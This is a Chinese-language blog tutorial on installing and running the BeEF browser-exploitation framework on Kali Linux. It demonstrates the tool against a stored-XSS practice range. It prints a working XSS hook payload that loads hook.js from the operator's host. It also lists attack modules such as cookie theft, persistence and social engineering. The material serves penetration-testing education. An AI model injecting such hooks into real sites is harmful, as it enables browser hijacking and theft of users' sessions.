xss-工具-Beef-Xss安装以及使用
Beef-Xss工具的简介
KaliLinux官网对这工具的介绍地址:https://www.kali.org/tools/beef-xss/ GitHub地址:https://github.com/beefproject/beef Beef-Xss工具Wiki:https://github.com/beefproject/beef/wiki
BeEF 是浏览器开发框架的缩写,它是一款专注于网络浏览器的渗透测试工具 随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况,与其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器 BeEF 将挂钩一个或多个 Web 浏览器,并将它们用作启动定向命令模块的滩头阵地,并从浏览器上下文中进一步攻击系统
安装Beef-Xss工具
这个工具最新的KaliLinux版本这个工具默认是不安装的,之前老版本的是自带的不管这么
apt-get install beef-xss
或
sudo apt-get install beef-xss
一路 y 就好,然后等待
如果出现下图,解决方法换地址源或者 apt update
重启之后在执行安装命令
启动Beef-Xss工具
beef-xss
第一次启动可能会提示这个,让你输入一个新的密码,输入回车即可(不会显示你输入的密码)下一次就不会让你输入了
它会自动打开浏览器 beef 控制台(账号默认:beef 密码(你第一次进入beef输入的))
关闭Beef-Xss
beef-xss-stop
Beef-Xss登录账户密码忘记解决方案:
安装之后在 /usr/share/beef-xss 目录下有一个 config.yaml
文件里面记录了密码账号:
用 vim 或者其它方式打开config.yaml
文件中 credentials: 下的 user是账号、passwd是密码,直接修改保存即可
启动Beef-Xss之后控制台会有一下信息
beef的xss代码格式:
<script src="http://<IP>:3000/hook.js"></script>
例子:比如我的KaliLinux的ip地址:192.168.56.129
<script src="http://192.168.56.129:3000/hook.js"></script>
beef控制台地址
http://127.0.0.1:3000/ui/panel 或者我的KaliLinux的ip地址:192.168.56.129 在宿主机浏览器输入:http://192.168.56.129:3000/ui/panel 都可以
Beef-Xss使用
我用pikachu靶场xss的存储型演示:
上面已经看到成功了,有时不一定怎么快展示等一会刷新一下
获取这些之后,具体可以实现上面功能在 commands 中查看
commands 模块中大概都是什么意思
我这里用就直接用谷歌翻译了
点击任意一个都有说明的比如播放声音模块
Browser(浏览器模块)
Chrome Extensions (Chrome 扩展)
Debug (调试)
Exploits(漏洞利用)
Host(主持人)
IPEC(国际环保提倡)
利用通信 (IPEC)进行的操作
Metasploit
Misc(杂项)
Network(网络)
Persistence(坚持)
Phonegap(电话间隙)
Social Engineering(社会工程)
简单的使用一个播放声音
是有一个 biu的一个声音
检测是否有 VLC
获取cookie
还有很多功能的这里就不一一演示了
相关文章
- Charles for Mac中文版(HTTP信息抓包工具)安装教程
- Python安装与第三方工具——pycharm安装
- 【工具使用】SecureCRT的下载、安装图文详细过程介绍[通俗易懂]
- adb工具+使用adb安装apk「建议收藏」
- python3安装后没有pip_解决Centos7安装python3后pip工具无法使用「建议收藏」
- Windows下的labelme数据标注工具安装教程[通俗易懂]
- 免费的mysql可视化工具_centos7安装oracle
- appuploader工具的安装介绍
- 屏幕画笔工具pointofox安装过程
- 压测工具Jmeter的安装与使用
- 【Android 逆向】使用 DB Browser 查看并修改 SQLite 数据库 ( 下载 DB Browser 安装包 | 安装 DB Browser 工具 )
- PDF Expert for mac(pdf编辑必备工具) 安装使用功能介绍
- 一键快速安装Linux:U盘启动工具的神奇使用!(u盘启动工具linux)
- Epiphany是Gnome默认的浏览器,主要希望用户能关注其内容而不是浏览器本身。安装Epiphany时,你就会为其表现惊艳。同时记得安装Epiphany拓展软件包,可以使用很多插件和工具。但是Epiphany在观看Flash或JavaScript网站时会遇到问题,不过相信这一点很快就会得到解决。
- 轻松实现:使用PE工具轻松安装Linux系统(pe能安装linux)
- Dooble是用Qt4写的另外一款WebKit浏览器,主要在保护用户隐私方面取胜。虽然它和其他浏览器提供的安全性相差不打,但是也有一些特有的属性比如内含的桌面等。Dooble桌面使得用户可以在增加桌面背景的同时添加应用程序启动,除了从软件包管理器安装外,还可以使用Ubuntu 10.10版本0.07安装,此时的Dooble版本为1.14,同时还要有Qt编码工具如qt4-qmake等。
- MYSQL下载和安装INS教程,让你学会如何在电脑上安装MYSQL,使用INS命令行工具管理数据库
- 集群运维自动化工具ansible的安装与使用(包括模块与playbook使用)